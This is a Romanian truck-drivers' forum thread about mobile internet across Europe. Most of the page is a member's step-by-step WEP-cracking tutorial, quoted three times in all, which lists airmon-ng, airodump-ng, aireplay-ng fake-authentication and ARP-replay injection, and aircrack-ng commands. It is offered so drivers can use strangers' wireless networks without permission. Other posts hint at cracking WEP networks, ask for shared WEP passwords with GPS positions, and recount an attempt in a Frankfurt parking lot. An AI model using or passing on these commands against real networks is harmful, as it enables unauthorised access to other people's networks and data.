Comunitatea soferilor profesionisti Sari la conținut

Internet mobil cu acoperire in toata UE


Vizitator Anonymous

Postări Recomandate

  • Members

coane LSX,

nu exista asa ceva,...decit in prezentarile firmelor de telefonie mobila...

ma refer la situatia in care esti sofer si vrei s-a ai internet in toata Europa,la ce scoruri sint pt date...

.chiar si in situatia ,ideala,in care ai acces abonament sau cartela prepay, la internet tot te costa ,

documentare suplimentara gasesti aici:  http://soferii.ro/Forum/http://forum.soferii.ro//viewtopic.php?t=7, http://soferii.ro/Forum/http://forum.soferii.ro//viewtopic.php?t=4

parerea mea!!!

Toate cele bune!!!

Link spre comentariu
Distribuie pe alte site-uri

  • Administrators

coane LSX,

nu exista asa ceva,...decit in prezentarile firmelor de telefonie mobila...

ma refer la situatia in care esti sofer si vrei s-a ai internet in toata Europa,la ce scoruri sint pt date...

.chiar si in situatia ,ideala,in care ai acces abonament sau cartela prepay, la internet tot te costa ,

documentare suplimentara gasesti aici:  http://soferii.ro/Forum/http://forum.soferii.ro//viewtopic.php?t=7, http://soferii.ro/Forum/http://forum.soferii.ro//viewtopic.php?t=4

parerea mea!!!

Toate cele bune!!!

Ai internet in roaming cam la 4 euro megabaitul. Si cel mai bine cauti retele wi-fi free

Link spre comentariu
Distribuie pe alte site-uri

  • 1 month later...
  • 3 weeks later...
  • Members

trebuie sa ai o adresa unde sa-ti  vina factura in germania.

stick-ul de vodafone era in jur de 30€ cu 2 ore incluse si dupa il incarci cu cit vre,minmum parca 15€i.

0.5€era parca 30min.nu mai exact pentru ca l-am cumparat anu trecut si anu asta n-am prea circulat  prin  DE

Link spre comentariu
Distribuie pe alte site-uri

  • 5 months later...
  • Moderators

Desi e vechi acest thread, bag si io o idee, pentru ca subiectul m-a interesat si pe mine desi sunt sofer profesionist in devenire.

Asta a fost singura posibilitate de a avea internet oriunde in Europa.

Preturile pleaca de la 200€/luna in sus (abonamentul lunar), dar partea nasoala e la echipament... de la 2000€ in sus. Asa ca...

Alte variante ar fi:

- un modem pt. SIM-uri, si pentru fiecare tara cumparata cate o cartela SIM preplatita, la care se activeaza serviciul de internet;

- o antena tin-can (facuta pe genunchi) si mult noroc la gasit retele neprotejate (sau cel mult criptare WEP, cunoscatorii stiu de ce);

- asa cum s-a mai spus pe aici, umblatul la mila hotspoturilor (free), acolo unde sunt;

Bafta la toata lumea.

Link spre comentariu
Distribuie pe alte site-uri

  • Members

numai hackeri cunoscatori pe aici dar nu explica nimieni cat de usor sparg ei parolele wep...

Nu vreau link-uri de pe youtube,vreau sa spuneti voi ce chipset aveti la placa wireless,ce configuratie hard si soft ati folosit etc.

Link spre comentariu
Distribuie pe alte site-uri

  • Moderators

Unde ai vazut tu "hackeri cunoscatori pe aici" ?!?

Nu sunt sigur ca-mi place ceea ce insinuezi, dar dat fiind faptul ca am fost singurul care a mentionat ceva legat de parolarea WEP a retelelor wireless, ma simt nevoit sa fac niste clarificari:

1. nu sunt, n-am fost si mai mult ca sigur nu voi fi niciodata un "hacker cunoscator";

2. cand am sugerat ca retelele parolate WEP pot fii "hackuite", ma refeream exact la asta, ca da, pot fi sparte. N-am facut nici o referire ca stiu/pot/vreau sa fac eu asa ceva, nici pentru mine, nici pentru altcineva;

3. daca vrei sa afli "cum" se face asa ceva eu nu pot sa-ti recomand decat www.google.com si multa rabdare. In fond, gasesti pe net inclusiv retete pentru bombe, de ce nu si o metoda de a accesa incognito o retea WEP;

Una peste alta, nu e cazul sa ma iei peste picior, doar pentru ca tu stii mai multe despre criptarea WEP.

Bafta multa.

Link spre comentariu
Distribuie pe alte site-uri

  • 1 month later...
  • Members

SALUT COLEGI PENTRU A AVEA INTERNET TOTA EUROPA VA RECOMAND SA CUMPARATI O CHEITA DE LA TIM DIN ITALIA CA ASTIA NU LE CODEAZA SI CAND ESTI IN ALTA TARA POTI SCHIMBA CARTELA SAU PE ROMING  CUM DORITI PE ITALIA ARE NELIMITAT CU 20 EURO PE LUNA DRUMURI BUNE                P.S e fara abonament si o poti cumpara cu pasaportu

                                                                                                                         

Link spre comentariu
Distribuie pe alte site-uri

Vizitator Anonymous

daca gasesc retele wi-fi gratuite mai imi trebuie sa am ceva soft in laptop sau pur si simplu dau click pe explorer si gaseste??? cam pe unde sant astea in italia si spania??

Link spre comentariu
Distribuie pe alte site-uri

  • Members

Noroc colegii,

Nu tre sa fii hacker ca sa spargi cheile WEP. O sa va explic in cateva randuri cum se face. Exista mai multe programe dar eu folosesc BackTrack. Este o distributie bazata in Linux. Descarcam programul din link-ul asta --> http://www.backtrack-linux.org/; Se poate folosi in virtualPC, LiveCD sau se poate instala intr-o memorie USB. Dar va explic cum se foloseste LiveCD. Dupa ce descarcati imaginea .iso cu programul ardeti CD-ul. O data facut CD-ul ne pregatim pentru urmatorii pasi. Dar mai intai tre sa clarific unele denumiri pe scurt ca sa stim cu ce se mananca.

BSSID sau MAC: directia fizica ai placii de retea.

SSID: numele retelei.

AP: Punct de acces.

channel: canalul pe care reteaua transmite informatii.

1. Boot-ezi din CD, reinitiezi cu CD-ul in dispozitivul DVD sau CD-Rom si apesi tasta F12 alegi optiunea ca vrei sa boot-ezi din CD si apesi Enter.

2. Apare o fereasra unde ai mai multe optiuni de initiere si alegem Default, cred ca este prima optiune de sus.

3. O sa ne ceara User si password, cand apare bt login: User este : root si pass: toor. Dupa logare ne apare secventa root#bt: unde tre sa scriem: startx.

4. Dupa ce se initiaza sistemul ne apare primul screen, in partea stanga jos o sa vedeti consola de comenzi, e un ecran mic de culoare neagra. Dam click pe ea si o deschidem. Putem deschide o consola noua de cate ori avem nevoie.

In prima consola scriem:

       

    a)      airmon-ng start wlan0

    Aici the interface intra in modul monitor sau promiscuu.

    B)      airodump-ng mon0

  Apar toate retelele, tre sa ne uitam cu atentie sa vedem care dintre ele transmite cu mai multa energie si mai multe pachete. Primul rand de sus se vad niste parametri: Pwr, Beacons, Data, Enc si Essid. Retelele interesante sunt acelea care transmit mai multe Beacons si Data.

Daca suntem hotarati si am decis care este reteaua tinta deschidem alta consola si scriem:

    airodump-ng -c [channel] --bssid [APMAC]- w [filename.cap] mon0

  Channel: este o valoare cuprinsa intre 1 si 11 ne uitam de sus unde scrie CH in jos pana ajungem la reteaua tinta si scriem valoarea care o are.

APMAC: este directia fizica hexadecimala si trebuie scrisa la fel cu doua puncte, ex: 00:C7:....

Filename.cap: scrieti ce vreti voi de exemplu: captura.cap

      Un exemplu cam cum tre sa ramana comanda de mai sus:

   

                  airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w captura.cap mon0

Deschidem alta consola si injectam trafic sau cereri -arp sa-l inebunim pe colegul:

          aireplay-ng --fakeauth 0 -e [sSID] -a [bSSID] mon0

  SSID: este numele retelei.

  BSSID: directia fisica sau MAC.

Deschidem alta consola si scriem:

              aireplay-ng -3 -b [bSSID] mon0 -x 250

In consola cu airodump-ng se vede cum capturam Data si cat mai multe avem cu atat mai bine, la 10.000 pachete capturate folosim ultima comanda:

    aircrack-ng -z -b [bSSID] [filename.cap-01]

       

In cultima comanda filename.cap il gasiti in sceen, va aduceti aminte ca am dat un exemplu captura.cap.

Daca la 10.000 de pachete nu reuseste sa descifreze cheia incercati la 15.000 pachete capturate si tot asa pana reusiti.

Sper sa va fie de folos si nu uitati ca eu nu ma fac responsabil de ce si cum fiecare dintre voi foloseste acest program.

Link spre comentariu
Distribuie pe alte site-uri

  • EX Staff

Noroc colegii,

Nu tre sa fii hacker ca sa spargi cheile WEP. O sa va explic in cateva randuri cum se face. Exista mai multe programe dar eu folosesc BackTrack. Este o distributie bazata in Linux. Descarcam programul din link-ul asta --> http://www.backtrack-linux.org/; Se poate folosi in virtualPC, LiveCD sau se poate instala intr-o memorie USB. Dar va explic cum se foloseste LiveCD. Dupa ce descarcati imaginea .iso cu programul ardeti CD-ul. O data facut CD-ul ne pregatim pentru urmatorii pasi. Dar mai intai tre sa clarific unele denumiri pe scurt ca sa stim cu ce se mananca.

BSSID sau MAC: directia fizica ai placii de retea.

SSID: numele retelei.

AP: Punct de acces.

channel: canalul pe care reteaua transmite informatii.

1. Boot-ezi din CD, reinitiezi cu CD-ul in dispozitivul DVD sau CD-Rom si apesi tasta F12 alegi optiunea ca vrei sa boot-ezi din CD si apesi Enter.

2. Apare o fereasra unde ai mai multe optiuni de initiere si alegem Default, cred ca este prima optiune de sus.

3. O sa ne ceara User si password, cand apare bt login: User este : root si pass: toor. Dupa logare ne apare secventa root#bt: unde tre sa scriem: startx.

4. Dupa ce se initiaza sistemul ne apare primul screen, in partea stanga jos o sa vedeti consola de comenzi, e un ecran mic de culoare neagra. Dam click pe ea si o deschidem. Putem deschide o consola noua de cate ori avem nevoie.

In prima consola scriem:

       

    a)      airmon-ng start wlan0

    Aici the interface intra in modul monitor sau promiscuu.

    B)      airodump-ng mon0

  Apar toate retelele, tre sa ne uitam cu atentie sa vedem care dintre ele transmite cu mai multa energie si mai multe pachete. Primul rand de sus se vad niste parametri: Pwr, Beacons, Data, Enc si Essid. Retelele interesante sunt acelea care transmit mai multe Beacons si Data.

Daca suntem hotarati si am decis care este reteaua tinta deschidem alta consola si scriem:

    airodump-ng -c [channel] --bssid [APMAC]- w [filename.cap] mon0

  Channel: este o valoare cuprinsa intre 1 si 11 ne uitam de sus unde scrie CH in jos pana ajungem la reteaua tinta si scriem valoarea care o are.

APMAC: este directia fizica hexadecimala si trebuie scrisa la fel cu doua puncte, ex: 00:C7:....

Filename.cap: scrieti ce vreti voi de exemplu: captura.cap

      Un exemplu cam cum tre sa ramana comanda de mai sus:

   

                  airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w captura.cap mon0

Deschidem alta consola si injectam trafic sau cereri -arp sa-l inebunim pe colegul:

          aireplay-ng --fakeauth 0 -e [sSID] -a [bSSID] mon0

  SSID: este numele retelei.

  BSSID: directia fisica sau MAC.

Deschidem alta consola si scriem:

              aireplay-ng -3 -b [bSSID] mon0 -x 250

In consola cu airodump-ng se vede cum capturam Data si cat mai multe avem cu atat mai bine, la 10.000 pachete capturate folosim ultima comanda:

    aircrack-ng -z -b [bSSID] [filename.cap-01]

       

In cultima comanda filename.cap il gasiti in sceen, va aduceti aminte ca am dat un exemplu captura.cap.

Daca la 10.000 de pachete nu reuseste sa descifreze cheia incercati la 15.000 pachete capturate si tot asa pana reusiti.

Sper sa va fie de folos si nu uitati ca eu nu ma fac responsabil de ce si cum fiecare dintre voi foloseste acest program.

Las-o dreaq de treaba, puteai sa pui decat link-ul cu forumul respectiv, pai cine sta sa faca tot acest " tabiet ", ajungi la pensie !!!

Link spre comentariu
Distribuie pe alte site-uri

  • EX Staff

Am vrut sa fie cuiva de folos si am scris doar ceea ce am invatat la scoala, daca nu e util se poate sterge. Imi cer scuze.

Nu trebuie sa te scuzi, dar am mai vazut undeva tema asta, pe un alt forum dedicat it-ului, am avut vaga impresie ca doar l-ai copiat .

Cele bune !!!

Link spre comentariu
Distribuie pe alte site-uri

  • 4 weeks later...
Vizitator Anonymous

Daca stiti popasuri cu Wi-Fi gratuit sau aveti parole WEP puneti-le pe site cu pozitia GPS ca sa avem si noi.

Foloseste cineva Robinu, merita banii ?

Link spre comentariu
Distribuie pe alte site-uri

  • 8 months later...
  • Members

Am vrut sa fie cuiva de folos si am scris doar ceea ce am invatat la scoala, daca nu e util se poate sterge. Imi cer scuze.

              E tare util colegule ! Pentru unii este ELECTROFANTASTIC ! Dar trebuie sa stai cam mult prin parcare si sa fi un mic cibernetic... . Nu mai fi asa modest ca noi am vazut ca le sti pe astea... ! De aceea propun si eu ceva :

Primul care reuseste sa intre pe net folosind indicatiile tale ( cu privire la retelele wireless protejate.... WPA 2 )si sa ajunga la timp la incarcare/descarcare, sa predea camionul si sa depuna CV la NASA. La ce sa se mai chinuie cu  .... prelata ?

      Drumuri line tuturor

Link spre comentariu
Distribuie pe alte site-uri

  • Members

Noroc colegii,

Nu tre sa fii hacker ca sa spargi cheile WEP. O sa va explic in cateva randuri cum se face. Exista mai multe programe dar eu folosesc BackTrack. Este o distributie bazata in Linux. Descarcam programul din link-ul asta --> http://www.backtrack-linux.org/; Se poate folosi in virtualPC, LiveCD sau se poate instala intr-o memorie USB. Dar va explic cum se foloseste LiveCD. Dupa ce descarcati imaginea .iso cu programul ardeti CD-ul. O data facut CD-ul ne pregatim pentru urmatorii pasi. Dar mai intai tre sa clarific unele denumiri pe scurt ca sa stim cu ce se mananca.

BSSID sau MAC: directia fizica ai placii de retea.

SSID: numele retelei.

AP: Punct de acces.

channel: canalul pe care reteaua transmite informatii.

1. Boot-ezi din CD, reinitiezi cu CD-ul in dispozitivul DVD sau CD-Rom si apesi tasta F12 alegi optiunea ca vrei sa boot-ezi din CD si apesi Enter.

2. Apare o fereasra unde ai mai multe optiuni de initiere si alegem Default, cred ca este prima optiune de sus.

3. O sa ne ceara User si password, cand apare bt login: User este : root si pass: toor. Dupa logare ne apare secventa root#bt: unde tre sa scriem: startx.

4. Dupa ce se initiaza sistemul ne apare primul screen, in partea stanga jos o sa vedeti consola de comenzi, e un ecran mic de culoare neagra. Dam click pe ea si o deschidem. Putem deschide o consola noua de cate ori avem nevoie.

In prima consola scriem:

       

    a)      airmon-ng start wlan0

    Aici the interface intra in modul monitor sau promiscuu.

    B)      airodump-ng mon0

  Apar toate retelele, tre sa ne uitam cu atentie sa vedem care dintre ele transmite cu mai multa energie si mai multe pachete. Primul rand de sus se vad niste parametri: Pwr, Beacons, Data, Enc si Essid. Retelele interesante sunt acelea care transmit mai multe Beacons si Data.

Daca suntem hotarati si am decis care este reteaua tinta deschidem alta consola si scriem:

    airodump-ng -c [channel] --bssid [APMAC]- w [filename.cap] mon0

  Channel: este o valoare cuprinsa intre 1 si 11 ne uitam de sus unde scrie CH in jos pana ajungem la reteaua tinta si scriem valoarea care o are.

APMAC: este directia fizica hexadecimala si trebuie scrisa la fel cu doua puncte, ex: 00:C7:....

Filename.cap: scrieti ce vreti voi de exemplu: captura.cap

      Un exemplu cam cum tre sa ramana comanda de mai sus:

   

                  airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w captura.cap mon0

Deschidem alta consola si injectam trafic sau cereri -arp sa-l inebunim pe colegul:

          aireplay-ng --fakeauth 0 -e [sSID] -a [bSSID] mon0

  SSID: este numele retelei.

  BSSID: directia fisica sau MAC.

Deschidem alta consola si scriem:

              aireplay-ng -3 -b [bSSID] mon0 -x 250

In consola cu airodump-ng se vede cum capturam Data si cat mai multe avem cu atat mai bine, la 10.000 pachete capturate folosim ultima comanda:

    aircrack-ng -z -b [bSSID] [filename.cap-01]

       

In cultima comanda filename.cap il gasiti in sceen, va aduceti aminte ca am dat un exemplu captura.cap.

Daca la 10.000 de pachete nu reuseste sa descifreze cheia incercati la 15.000 pachete capturate si tot asa pana reusiti.

Sper sa va fie de folos si nu uitati ca eu nu ma fac responsabil de ce si cum fiecare dintre voi foloseste acest program.

Germania, 2011,  Frankfurt, zona industriala invecinata cu cea rezidentiala, colegu' Ciprian (eram in echipaj) se apuca sa imi arate ce program "teava" are de pinguinat netul mancatorilor de varza acra. Buuuuuun. Dupa 3 ore de demonstratii fara rezultat(imi scapa numele programului) pe langa Scania noastra a inceput sa se plimbe un nene ciudat cu un aparat gen Star Trek si cu telefonul la urechea lui valoroasa. Va dati seama ce ureche avea...

Urmarea... am dat cheie la Scania noastra super valoroasa si fara sa avem incarcare si i-am trombonit pe dispeceri sa ne dea ceva "ca ne-au dat afara nazistii din parcare" (unde facusem weekendul de altfel).

Morala: Aveti grija pe unde o comiteti... si daca o sa calcati pe bec  sa aveti macar program nou(intreg) si dispeceri, daca nu intelegatori macar botanisti.

Link spre comentariu
Distribuie pe alte site-uri

Alătură-te conversației

Poți posta acum și să te înregistrezi mai târziu. Dacă ai un cont, autentifică-te acum pentru a posta cu contul tău.

Vizitator
Răspunde la acest topic...

×   Alipit ca text avansat.   Alipește ca text simplu

  Doar 75 emoji sunt permise.

×   Linkul tău a fost încorporat automat.   Afișează ca link în schimb

×   Conținutul tău precedent a fost resetat.   Curăță editor

×   Nu poți lipi imagini direct. Încarcă sau inserează imagini din URL.

  • Navigare recentă   0 membri

    • Nici un utilizator înregistrat nu vede această pagină.
×
×
  • Creează nouă...

Informații Importante

Pentru a naviga pe acest site , trebuie sa respectati termenii Termeni de Utilizare.